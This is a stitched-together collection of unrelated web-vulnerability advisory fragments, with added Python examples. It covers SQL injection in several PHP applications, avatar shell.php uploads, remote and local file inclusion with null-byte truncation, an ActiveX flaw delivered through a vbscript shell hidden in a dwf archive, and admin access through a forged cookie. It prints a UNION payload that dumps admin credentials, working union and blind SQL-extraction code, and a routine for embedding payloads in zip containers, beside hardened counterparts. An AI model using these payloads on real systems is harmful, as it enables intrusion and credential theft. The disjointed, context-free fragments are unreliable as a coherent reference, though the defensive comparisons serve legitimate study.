SG Real Estate Portal 2.0 is vulnerable to blind SQL injection. An attacker can exploit it to obtain the credentials for the application's admin panel. The exploit code takes the target URL and a valid user ID as input and then, because the injection is blind (no query output is reflected in the page, only whether a record was found), recovers the admin username and password one character at a time from the true/false behaviour of the vulnerable query.
Students and teachers can upload a shell.php file as their avatar and then execute it by requesting http://site/upload/student/avatars/shell.php or http://site/upload/professor/avatars/shell.php. In every site tested, the upload directory is web-accessible and the server executes PHP from it, so the upload check (if any) neither restricts the extension nor stores the file outside the web root.
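The avatar handler above keeps whatever filename the client sends and serves it from a directory that executes PHP. The following Python is an added example, not code from the affected application: it contrasts that behaviour with a hardened check that allow-lists the extension, verifies the image magic bytes and discards the client-supplied name. The sample uploads, the allow-list and the function names are constructed for the example.

```python
import os
import secrets
from typing import Optional

# Constructed sample uploads (not captured from any real site).
PHP_SHELL = b"<?php system($_GET['cmd']); ?>"
REAL_PNG = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16
JPEG_PHP_POLYGLOT = b"\xff\xd8\xff\xe0" + PHP_SHELL   # valid JPEG magic, PHP after it

# Extension allow-list with the magic bytes each one must start with.
ALLOWED_IMAGES = {
    ".png": b"\x89PNG\r\n\x1a\n",
    ".jpg": b"\xff\xd8\xff",
    ".gif": b"GIF8",
}


def vulnerable_store_name(filename: str, data: bytes) -> str:
    """The behaviour the advisory describes: the file is kept under the client's
    own name, so shell.php lands in upload/<role>/avatars/ and runs as PHP."""
    return os.path.basename(filename)


def hardened_store_name(filename: str, data: bytes) -> Optional[str]:
    """Return a server-chosen name to store the avatar under, or None to reject it."""
    ext = os.path.splitext(filename)[1].lower()
    magic = ALLOWED_IMAGES.get(ext)
    if magic is None:               # .php, .phtml, ... are not in the allow-list
        return None
    if not data.startswith(magic):  # PHP source renamed to shell.php.jpg fails here
        return None
    # Random name with a fixed image extension: the request path never ends in
    # .php, so the web server serves the bytes as an image even for a polyglot.
    return secrets.token_hex(16) + ext


def triage(uploads):
    """Run both checks over (filename, bytes) pairs.
    Returns {filename: (name the vulnerable code stores, accepted by hardened check)}."""
    return {
        name: (vulnerable_store_name(name, data), hardened_store_name(name, data) is not None)
        for name, data in uploads
    }
```

A JPEG/PHP polyglot still passes the content check, which is why the rename matters more than the magic-byte test; in addition, disable script execution in the avatar directory (or store avatars outside the web root and stream them), so that a bypass of the name check still does not yield code execution.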
Multiple files in Micronation Banking System (minba) 1.5.0 are vulnerable to remote file inclusion. An example of the vulnerable code is line 3 of minba/utility/utgn_message.php, which contains require_once("$minsoft_path/utility/utgn_config.php"); because the attacker controls the start of the include path, no directory traversal is needed: a URL in $minsoft_path makes PHP fetch and execute the remote file. For this to be exploitable, $minsoft_path must be settable from the request (typically through register_globals) and the PHP configuration must permit remote includes (allow_url_fopen, and on PHP 5.2 and later also allow_url_include).
SG Real Estate Portal 2.0 is vulnerable to blind SQL injection and to local file inclusion. The file inclusion is exploited by sending a request whose file parameter contains a relative path to the target file, using ../ sequences to leave the intended directory, with %00 (a URL-encoded null byte) appended so that any extension the script concatenates after the parameter is cut off; this null-byte truncation works on PHP versions before 5.3.4, whose file functions stop at the first null byte. The result is read access to sensitive files on the server, for example the application's own configuration.
The first vulnerability is caused by the CExpressViewerControl class (AdView.dll v9.0.0.96), which exposes an insecure SaveAS() method that writes a local file with an arbitrary extension. The second one concerns the ApplyPatch() method of the UpdateEngine class (LiveUpdate16.DLL, version 17.2.56 as far as could be determined; this is a shared component), which launches an arbitrary executable named by its second argument. Note that the first one, on its own, already allows arbitrary code execution. The impact of the second one is limited if you cannot specify command-line arguments or launch a file of your own. The embedded dwf file (located at http://retrogod.altervista.org/suntzu.dwf) was created by modifying an existing one, replacing a .png resource file with a vbscript shell through the following script (note the PCLZIP_OPT_NO_COMPRESSION flag, used so the script bytes are kept intact inside the archive; note also that dwf files are essentially zip archives).
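The member replacement described above (swap one resource inside the zip-based dwf container, storing it uncompressed so the bytes survive verbatim) can be reproduced with the standard library. The following Python is an added example, not the author's PclZip script: the archive contents, member names and the placeholder payload are all constructed for the example, and stand in for a real dwf.

```python
import io
import zipfile

# Constructed stand-in for a DWF package (DWF 6 and later is a ZIP container);
# the manifest text and member names are invented for the example.
MANIFEST = b"<dwf:Manifest/>"
PNG_MEMBER = "section_1/logo.png"


def make_demo_dwf() -> bytes:
    """Build a small deflated archive shaped like a dwf: a manifest plus a .png resource."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("manifest.xml", MANIFEST)
        z.writestr(PNG_MEMBER, b"\x89PNG\r\n\x1a\n" + b"\x00" * 32)
    return buf.getvalue()


def replace_member(container: bytes, member: str, new_data: bytes) -> bytes:
    """Rewrite the archive with one member's bytes swapped and stored uncompressed
    (the effect of PclZip's PCLZIP_OPT_NO_COMPRESSION), so the bytes sit verbatim
    in the file; every other member is copied through with its original metadata."""
    src = zipfile.ZipFile(io.BytesIO(container))
    out = io.BytesIO()
    with zipfile.ZipFile(out, "w") as dst:
        for info in src.infolist():
            if info.filename == member:
                dst.writestr(member, new_data, compress_type=zipfile.ZIP_STORED)
            else:
                dst.writestr(info, src.read(info.filename))   # keeps name, date, method
    return out.getvalue()


def member_bytes(container: bytes, member: str) -> bytes:
    """Decompressed content of one member, for checking the rewrite."""
    return zipfile.ZipFile(io.BytesIO(container)).read(member)


def stored_verbatim(container: bytes, member: str) -> bool:
    """True if the member is uncompressed and its bytes appear as-is in the file."""
    z = zipfile.ZipFile(io.BytesIO(container))
    info = z.getinfo(member)
    return info.compress_type == zipfile.ZIP_STORED and z.read(member) in container
```

The stored-verbatim check is the practical reason for the no-compression flag: a detection signature or a loader that scans the raw file only sees the replaced resource when it is not deflated.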
The 'catid' URL parameter is injectable. Sending it as catid=-1 union select concat(username,0x3a,password),2 FROM cfaq_admin-- makes the original query match nothing (-1 is not a valid category) and appends one row taken from the cfaq_admin table, whose first column is username:password (0x3a is the colon) and whose second column (2) merely pads the UNION to the column count of the original SELECT; the page then renders that row. The attacker can use the recovered credentials (cracking the password first if it is stored hashed) to log in to the admin panel at www.[target].com/Script//admin.php
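Both extraction styles on this page, the union-based payload for 'catid' just described and the blind character-by-character recovery used against SG Real Estate Portal earlier, are shown below in one added Python example that is not code from either advisory. It runs against a constructed in-memory SQLite database standing in for the real MySQL backends, so the string concatenation is written as username || ':' || password rather than concat(username,0x3a,password), and the blind probe uses unicode()/substr() where MySQL would use ascii()/substring(); the handler, table contents and function names are all assumptions made for the example.

```python
import sqlite3


def build_demo_db() -> sqlite3.Connection:
    """Constructed stand-in for the targets' MySQL databases (contents invented)."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE cfaq_cat (id INTEGER, name TEXT, sort INTEGER);
        INSERT INTO cfaq_cat VALUES (1, 'General', 10);
        INSERT INTO cfaq_cat VALUES (2, 'Billing', 20);
        CREATE TABLE cfaq_admin (id INTEGER, username TEXT, password TEXT);
        INSERT INTO cfaq_admin VALUES (1, 'admin', '5f4dcc3b5aa765d61d8327deb882cf99');
    """)
    return con


class VulnerablePage:
    """Hypothetical handler that interpolates 'catid' straight into its query.
    request() returns the rows the page would render, or None on a SQL error."""

    def __init__(self, con: sqlite3.Connection):
        self.con = con
        self.requests = 0          # what the attack costs in HTTP round trips

    def request(self, catid: str):
        self.requests += 1
        sql = f"SELECT name, sort FROM cfaq_cat WHERE id={catid}"
        try:
            return self.con.execute(sql).fetchall()
        except sqlite3.Error:
            return None


# --- union-based: output is reflected, so the data comes back in one request ---

def find_column_count(page: VulnerablePage, max_cols: int = 16):
    """ORDER BY n errors out once n exceeds the SELECT's column count."""
    for n in range(1, max_cols + 1):
        if page.request(f"1 order by {n}--") is None:
            return n - 1
    return None


def union_extract(page: VulnerablePage, expression: str, table: str):
    """Append one row per record of `table`; `expression` is the column to pull
    (the advisory's concat(username,0x3a,password)). Integer literals pad the
    UNION so its width matches the original SELECT."""
    ncols = find_column_count(page)
    pad = "".join(f",{i}" for i in range(2, ncols + 1))
    rows = page.request(f"-1 union select {expression}{pad} from {table}--")
    return [row[0] for row in rows]


# --- boolean blind: only "row shown / not shown" leaks, so ask one bit per request ---

def blind_extract(page: VulnerablePage, subquery: str, max_len: int = 64) -> str:
    """Recover the single string `subquery` returns, binary-searching the code
    point of each character (7 requests per character for 7-bit text)."""
    out = ""
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            probe = f"1 and unicode(substr(({subquery}),{pos},1))>{mid}"
            if page.request(probe):       # non-empty result means the condition held
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:                       # substr() past the end yields '' -> never true
            break
        out += chr(lo)
    return out
```

The request counter makes the cost difference concrete: the union payload needs a handful of requests to find the column width and one to dump the table, while the blind path spends seven requests per character, which is why blind exploits take a user ID and a target URL and loop rather than printing a single response.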
The vulnerability is caused by improper validation of user-supplied input in the 'rss' parameter of the 'rss.php' script. This can be exploited to include arbitrary local files through directory traversal (../ sequences in the parameter).
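The three file-inclusion items above differ only in where the attacker's string lands: at the start of the include path (the $minsoft_path case), or in the middle of a concatenation with a directory in front and an extension behind it (the %00 case and the 'rss' parameter). The following Python is an added example, not code from any of those applications; it models both concatenations, reproduces the pre-5.3.4 null-byte truncation, and shows a resolver that would have blocked all three. The base directory, the appended suffix and the function names are assumptions made for the example.

```python
import posixpath
from typing import Optional
from urllib.parse import unquote

BASE = "/var/www/app/rss"   # assumed directory the script intends to read from
SUFFIX = ".xml"             # assumed extension the script appends to the parameter


def vulnerable_prefix_include(minsoft_path: str) -> str:
    """Models require_once("$minsoft_path/utility/utgn_config.php"): the attacker
    controls the start of the string, so a URL prefix makes PHP fetch the file
    remotely when allow_url_include is on; no traversal is needed."""
    return unquote(minsoft_path) + "/utility/utgn_config.php"


def vulnerable_open_path(param: str) -> str:
    """Path the naive BASE + param + SUFFIX concatenation actually opens on PHP
    before 5.3.4: the string is handed to the C library, so a %00 terminates it
    and the appended suffix is discarded. Later versions reject NUL bytes instead."""
    value = unquote(param)                      # the server decodes %2e%2e%2f, %00, ...
    raw = BASE + "/" + value + SUFFIX
    if "\x00" in raw:
        raw = raw[: raw.index("\x00")]
    return posixpath.normpath(raw)


def safe_open_path(param: str) -> Optional[str]:
    """Hardened resolver: reject NUL bytes and anything carrying a scheme or stream
    wrapper (http://, php://, data:), normalise, and insist the result stays under
    BASE. Returns the path to open, or None to refuse the request."""
    value = unquote(param)
    if "\x00" in value or ":" in value:
        return None
    candidate = posixpath.normpath(posixpath.join(BASE, value + SUFFIX))
    if posixpath.commonpath([BASE, candidate]) != BASE:
        return None
    return candidate
```

Checking containment after normalisation is the point: a blacklist of "../" misses %2e%2e%2f and absolute paths, whereas comparing the resolved path's prefix against the base directory rejects both, and the NUL/scheme test in front of it is what separates a local file from a remote one.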
PG Matchmaking Script is prone to multiple remote SQL injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in SQL queries. An attacker can exploit these to manipulate the queries by injecting arbitrary SQL. This may allow the attacker to compromise the application, read or modify data, or exploit latent vulnerabilities in the underlying database implementation.
Post Comments v3.0 is vulnerable to insecure cookie handling: the admin check trusts a client-controlled cookie rather than a server-side session. An attacker who sets the PostCommentsAdmin cookie to the value 'logged' with path '/' (so the browser sends it on every request to the site) is treated as logged in and gains access to the admin panel without any credentials.
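The flaw above is the authorisation check itself, so the useful comparison is the check as described beside one that a forged cookie cannot pass. The following Python is an added example, not Post Comments' code: the first function reproduces the trusting comparison from the advisory, the second only honours a role once an HMAC minted with a server-side key verifies. The key, the cookie layout and the function names are assumptions made for the example.

```python
import hashlib
import hmac
from typing import Optional
from http.cookies import SimpleCookie

COOKIE = "PostCommentsAdmin"
SERVER_KEY = b"constructed-demo-key-use-a-random-secret-in-practice"  # assumed secret


def cookie_value(header: str) -> Optional[str]:
    """Pull our cookie out of a Cookie request header, or None if it is absent."""
    jar = SimpleCookie()
    jar.load(header)
    return jar[COOKIE].value if COOKIE in jar else None


def vulnerable_is_admin(header: str) -> bool:
    """The check the advisory describes: a client-settable flag is trusted outright,
    so 'PostCommentsAdmin=logged' set by hand in the browser is enough."""
    return cookie_value(header) == "logged"


def mint_cookie(user: str, role: str, key: bytes = SERVER_KEY) -> str:
    """Server-issued value: user:role plus an HMAC over both, so neither field can
    be edited by the client without invalidating the tag."""
    payload = f"{user}:{role}"
    tag = hmac.new(key, payload.encode(), hashlib.sha256).hexdigest()
    return f"{payload}:{tag}"


def hardened_is_admin(header: str, key: bytes = SERVER_KEY) -> bool:
    """Accept the role only after the tag verifies, in constant time."""
    value = cookie_value(header)
    if value is None:
        return False
    parts = value.split(":")
    if len(parts) != 3:
        return False
    user, role, tag = parts
    expected = hmac.new(key, f"{user}:{role}".encode(), hashlib.sha256).hexdigest()
    return hmac.compare_digest(tag, expected) and role == "admin"
```

A signed cookie is shown because it keeps the example self-contained; the more common fix is an opaque random session identifier with the role held server-side, which additionally allows sessions to be revoked. Either way the property that matters is the same: the client cannot produce a value the server will accept as admin.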
A remote SQL injection vulnerability exists in Arcadem Pro (articlecat). An attacker can send a specially crafted HTTP request containing SQL statements to the vulnerable application in order to read unauthorized information or to manipulate data. The injected SQL is supplied through the 'articlecat' parameter, which is reached via the application's 'loadpage' parameter and is used in a query without sufficient sanitization.